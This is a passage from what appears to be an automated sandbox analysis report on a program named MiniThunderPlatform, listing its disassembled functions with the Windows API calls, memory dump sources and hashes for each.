                                                                                                                                              • Opcode Fuzzy Hash: 97aab0092ca7a0e6a19b14907e14f3349e6517ed9fedf8edb5344890643af950
                                                                                                                                              • Instruction Fuzzy Hash: 5721B278A0061D9BDB20DB5AC985BAEB7B9FB58771F100219E816AB380D7386841CF95
                                                                                                                                              Function 00422F10 Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00422F86
                                                                                                                                              • SetEvent.KERNEL32(00000000), ref: 00422FA1
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00422FB4
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00422FD7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??1?$basic_string@_U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$CloseEventHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 315019268-0
                                                                                                                                              • Opcode ID: 850aeab4bd0cd195c04fcdd967679d831fca2492b695991db760199d0786dada
                                                                                                                                              • Instruction ID: 61685c3753e301f7780166737cd3b71537efcb652d9752f802e63a37fe3dc0ec
                                                                                                                                              • Opcode Fuzzy Hash: 850aeab4bd0cd195c04fcdd967679d831fca2492b695991db760199d0786dada
                                                                                                                                              • Instruction Fuzzy Hash: A421D6B2D0061C9BCB20EF98D846BCDBB74EB04324F11026AF525A7281DB386E85CBD5
                                                                                                                                              Function 100A4180 Relevance: 6.1, APIs: 4, Instructions: 71COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00002000,?,?,?,?,?,?,?,?,?,?,1024C46F,000000FF), ref: 100A4206
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBD@Z.MSVCP71(00000000,?,?,?,?,?,?,?,?,?,?,1024C46F,000000FF), ref: 100A4225
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,1024C46F,000000FF), ref: 100A4232
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A4248
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??1?$basic_string@?assign@?$basic_string@V01@@V12@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3882326332-0
                                                                                                                                              • Opcode ID: 126c7aa87f93ddd3cbd6979761030c7e9232af65b1e7fa2fc5f9e523106e175b
                                                                                                                                              • Instruction ID: dfdba95a180ee931e1021c189a72f600739d2860004abfc5f05aac12fa9881bc
                                                                                                                                              • Opcode Fuzzy Hash: 126c7aa87f93ddd3cbd6979761030c7e9232af65b1e7fa2fc5f9e523106e175b
                                                                                                                                              • Instruction Fuzzy Hash: 6421B275608750DFD324DF18C888B5AF7E5FBD8B10F418A2DF54687281DB74A908CBA2
                                                                                                                                              Function 100487A0 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • shutdown.WS2_32(?,00000002), ref: 100487BD
                                                                                                                                              • closesocket.WS2_32(?), ref: 100487C7
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?), ref: 100487DC
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?), ref: 100487F3
                                                                                                                                                • Part of subcall function 1003C630: RtlEnterCriticalSection.NTDLL(?), ref: 1003C658
                                                                                                                                                • Part of subcall function 1003C630: RtlLeaveCriticalSection.NTDLL(?), ref: 1003C6E7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@CriticalSection$EnterLeaveclosesocketshutdown
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1776028780-0
                                                                                                                                              • Opcode ID: 9a26d3b98fb180b142f1eaefd6a6d17c64e03b2e1e4a290ae82f1a2136d6e257
                                                                                                                                              • Instruction ID: 6f5583cc3ed725c21356b9cacbafe18c2d0d114fd62810298820310286f1a011
                                                                                                                                              • Opcode Fuzzy Hash: 9a26d3b98fb180b142f1eaefd6a6d17c64e03b2e1e4a290ae82f1a2136d6e257
                                                                                                                                              • Instruction Fuzzy Hash: EEF0C4B4600B009BD630DF39D889E1772E8AB14220F654F2CE466C7691D774E949CB94
                                                                                                                                              Function 10053EB0 Relevance: 6.0, APIs: 4, Instructions: 32networktimeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • WSAEventSelect.WS2_32(?,?,00000000), ref: 10053EC6
                                                                                                                                              • closesocket.WS2_32(?), ref: 10053ED5
                                                                                                                                              • WSACloseEvent.WS2_32(?), ref: 10053EEB
                                                                                                                                              • CancelWaitableTimer.KERNEL32(?), ref: 10053F00
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Event$CancelCloseSelectTimerWaitableclosesocket
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 415103784-0
                                                                                                                                              • Opcode ID: 7ca3501c7964730f19dab297ee30f07a4562e4b6a67d944ddf36c14bc2b2be9d
                                                                                                                                              • Instruction ID: b614680991b70da72320915489743fc1ccdf8c3aa9823a52a48938fb9428302a
                                                                                                                                              • Opcode Fuzzy Hash: 7ca3501c7964730f19dab297ee30f07a4562e4b6a67d944ddf36c14bc2b2be9d
                                                                                                                                              • Instruction Fuzzy Hash: 4DF0E270600B119BC670DF38988DA177BF9AB19731B604B08F4B2D26E0C774EC8A8A50
                                                                                                                                              Function 0042D98E Relevance: 6.0, APIs: 4, Instructions: 30threadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0042D99E
                                                                                                                                              • ResetEvent.KERNEL32(00000000), ref: 0042D9A8
                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00017695,?,00000004,?), ref: 0042D9BC
                                                                                                                                              • ResumeThread.KERNEL32(00000000,?,00000004,?), ref: 0042D9CC
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateEventThread$ResetResume
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2675713473-0
                                                                                                                                              • Opcode ID: 694ab5103bb9c0e3cd86a7df8e467364022882ea3bab481a350b15e12183f3c3
                                                                                                                                              • Instruction ID: 90666abd80c827cb0be643baf3691ab1b161ff775cd06c15629b76b02b2d405f
                                                                                                                                              • Opcode Fuzzy Hash: 694ab5103bb9c0e3cd86a7df8e467364022882ea3bab481a350b15e12183f3c3
                                                                                                                                              • Instruction Fuzzy Hash: 20F039F5942316BFE7209B609C88EA77BACDB0035AB40C82BF256D1453D2788C808B68
                                                                                                                                              Function 1000F850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • 754B1540.VERSION(00000000), ref: 1000F8AC
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(00000000,?,00000000,?,00000000,7C3869BF,7C3869BF), ref: 1000F8E8
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: B1540
                                                                                                                                              • String ID: 4
                                                                                                                                              • API String ID: 332761040-4088798008
                                                                                                                                              • Opcode ID: c6b30a4b740a8a5c363885ba5701f22bafe8c79f9c7938a2f243838f01b33d76
                                                                                                                                              • Instruction ID: e5dda95628c610a3a56ba98a4d6aba4df7e1d81bb736e0290becf152b58b0d29
                                                                                                                                              • Opcode Fuzzy Hash: c6b30a4b740a8a5c363885ba5701f22bafe8c79f9c7938a2f243838f01b33d76
                                                                                                                                              • Instruction Fuzzy Hash: 9A117C795042019EA300DF14A8808ABB3E8EF99690F44856DF85997310E674E849DBA2
                                                                                                                                              Function 0042EA72 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • swprintf.MSVCR71(?,%hu%c%hu%c%hu%c%hu,?,?,?,?,?,?,?), ref: 0042EAE4
                                                                                                                                              • ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@PB_W@Z.MSVCP71(0132B3A1), ref: 0042EB0D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@_U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@swprintf
                                                                                                                                              • String ID: %hu%c%hu%c%hu%c%hu
                                                                                                                                              • API String ID: 3790506687-2804730362
                                                                                                                                              • Opcode ID: 552eb5d677dfb13d29f0fb3cf4029ad79e7ea3df9300836c06c91f371bb793c5
                                                                                                                                              • Instruction ID: 350cc23ee02f10f67355b27663806576025cc5a971780ac7568d8a8e62ab256b
                                                                                                                                              • Opcode Fuzzy Hash: 552eb5d677dfb13d29f0fb3cf4029ad79e7ea3df9300836c06c91f371bb793c5
                                                                                                                                              • Instruction Fuzzy Hash: A62121B1D14228EACF18DFD5D8958FE77B8BF08700B14411FF503A6241E6B8A945C769
                                                                                                                                              Function 10010D0A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • 754B1540.VERSION(00000000,10277FB8,?,?,?,00000000,?,00000000,00000104,?,00000000,?,?,?,?,1001217A), ref: 10010D5D
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(00000000,?,00000000,?,00000000,00000104,?,00000000,?,?,?,?,1001217A,?,?,?), ref: 10010D93
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: B1540
                                                                                                                                              • String ID: 4
                                                                                                                                              • API String ID: 332761040-4088798008
                                                                                                                                              • Opcode ID: 3a9759d6b8a7d3da3ffdf5f5f41fd4d665057d76fadfc87a393d0acb47722449
                                                                                                                                              • Instruction ID: 68c247a4032e6a4f07d0f2c910b17b0b0eec64f93dd0fc2c10bfb333397af983
                                                                                                                                              • Opcode Fuzzy Hash: 3a9759d6b8a7d3da3ffdf5f5f41fd4d665057d76fadfc87a393d0acb47722449
                                                                                                                                              • Instruction Fuzzy Hash: D7114C79500209AACB10DFA5D845CDBBBB8EF89350B118095FC05DB361E770EA81CBA5
                                                                                                                                              Function 10054D60 Relevance: 4.6, APIs: 3, Instructions: 106networkCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 10059880: RtlEnterCriticalSection.NTDLL ref: 100598A5
                                                                                                                                                • Part of subcall function 10059880: RtlLeaveCriticalSection.NTDLL(1030012C), ref: 100598EB
                                                                                                                                              • WSAWaitForMultipleEvents.WS2_32(00000002,?,00000000,000000FF,00000000), ref: 10054DD6
                                                                                                                                              • WSAEnumNetworkEvents.WS2_32(000000FF,?,?), ref: 10054E3C
                                                                                                                                              • WSAGetLastError.WS2_32 ref: 10054E88
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalEventsSection$EnterEnumErrorLastLeaveMultipleNetworkWait
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1841062573-0
                                                                                                                                              • Opcode ID: cba2abe4266436d7c6f1daca76136a2007020b12c28bbbf180ddac7c0ee1f834
                                                                                                                                              • Instruction ID: 9aab1763fcdbb8ccd9a309567509f08f2f3273abca28a98434d6edef1d5ecb1d
                                                                                                                                              • Opcode Fuzzy Hash: cba2abe4266436d7c6f1daca76136a2007020b12c28bbbf180ddac7c0ee1f834
                                                                                                                                              • Instruction Fuzzy Hash: 64318174B046159BCB24CBA4C946BEEB3F5EB45624F220709E516A72C0DF74AD098BA1
                                                                                                                                              Function 10058A30 Relevance: 4.6, APIs: 3, Instructions: 91COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RtlEnterCriticalSection.NTDLL ref: 10058A5E
                                                                                                                                                • Part of subcall function 10058620: ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?,?,?,?), ref: 10058653
                                                                                                                                              • GetTickCount.KERNEL32 ref: 10058B1A
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(1030012C), ref: 10058B27
                                                                                                                                                • Part of subcall function 10053B90: inet_addr.WS2_32(?), ref: 10053BF8
                                                                                                                                                • Part of subcall function 10053B90: htons.WS2_32(00000035), ref: 10053C19
                                                                                                                                                • Part of subcall function 10053B90: sendto.WS2_32(?,?,00000200,00000000,00000002,00000010), ref: 10053C81
                                                                                                                                                • Part of subcall function 10053B90: WSAGetLastError.WS2_32 ref: 10053C8D
                                                                                                                                                • Part of subcall function 100569C0: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?,?,?,00000000,10058AC9,?,?,?,?,?,00000000,00000000,?), ref: 100569DA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$CriticalD@1@@std@@D@2@@0@0@SectionV?$basic_string@$??$???$?8CountEnterErrorLastLeaveTickhtonsinet_addrsendto
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 851188910-0
                                                                                                                                              • Opcode ID: 7c085fdc96a5c9dcea9df9d8469126a0396c834120888da3b1d1b0b526bf9729
                                                                                                                                              • Instruction ID: f26d7a44c78562843b6f3dafabac262216d6521728bb853b05bf87c67dac9ad9
                                                                                                                                              • Opcode Fuzzy Hash: 7c085fdc96a5c9dcea9df9d8469126a0396c834120888da3b1d1b0b526bf9729
                                                                                                                                              • Instruction Fuzzy Hash: 86319C756047419BE714CF28D988B1BB7E8EB88640F004A2DF986E7741EB35E908CB62
                                                                                                                                              Function 10011FFF Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 10012004
                                                                                                                                              • PathFileExistsW.SHLWAPI(?,?,10012228,?), ref: 1001200D
                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00000001,?,?,00000104,?,10012228,?), ref: 100120B7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateDirectoryExistsFileH_prologPath
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3726749946-0
                                                                                                                                              • Opcode ID: bd944bfb91498b9b58c8abfb911127a1f71fd64bf313c3ce272ce94db929bf53
                                                                                                                                              • Instruction ID: 3c70e0ba3886e88d6ba21110e44f0034d0269c4944cac29826d8ad1747a44cf4
                                                                                                                                              • Opcode Fuzzy Hash: bd944bfb91498b9b58c8abfb911127a1f71fd64bf313c3ce272ce94db929bf53
                                                                                                                                              • Instruction Fuzzy Hash: 04212AB5A1152A9FDB15DB94CC88AFEB7B4FF08350F404625F8219B251DA30E891CB51
                                                                                                                                              Function 00422DB0 Relevance: 4.6, APIs: 3, Instructions: 71COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00422E23
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00422E3E
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00422E5E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??1?$basic_string@_U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$CloseHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4015774982-0
                                                                                                                                              • Opcode ID: a64df8938be45a0f3dc0fe4d400e5f5f19cb5cd89bd649d44e75685bb3f489f2
                                                                                                                                              • Instruction ID: a779c4aef24be36c66422c440de2ebcd073d14dddb0b9e746bf53a399b6ee824
                                                                                                                                              • Opcode Fuzzy Hash: a64df8938be45a0f3dc0fe4d400e5f5f19cb5cd89bd649d44e75685bb3f489f2
                                                                                                                                              • Instruction Fuzzy Hash: 1321FB72D0065CAFDB20EBA4E8457DDBB74EB04324F51026AE52567281D6392E88CB95
                                                                                                                                              Function 1001B9B9 Relevance: 4.6, APIs: 3, Instructions: 61COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalH_prologLeaveSection
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1127631123-0
                                                                                                                                              • Opcode ID: 17a65d7075f95c4ab0ed90bcc0f40180488916e53a5990fc0cbbd1fd9548c34d
                                                                                                                                              • Instruction ID: 8567923fcf749bb5602ea66de6e8ef18dfaf8f44fa5bc27b1ceef245ec023e11
                                                                                                                                              • Opcode Fuzzy Hash: 17a65d7075f95c4ab0ed90bcc0f40180488916e53a5990fc0cbbd1fd9548c34d
                                                                                                                                              • Instruction Fuzzy Hash: A411C676610A15FBCB00DF68CC89A9F37A9EF0D260F404565FC06DF241DB31DA408BA0
                                                                                                                                              Function 10015899 Relevance: 4.6, APIs: 3, Instructions: 51COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
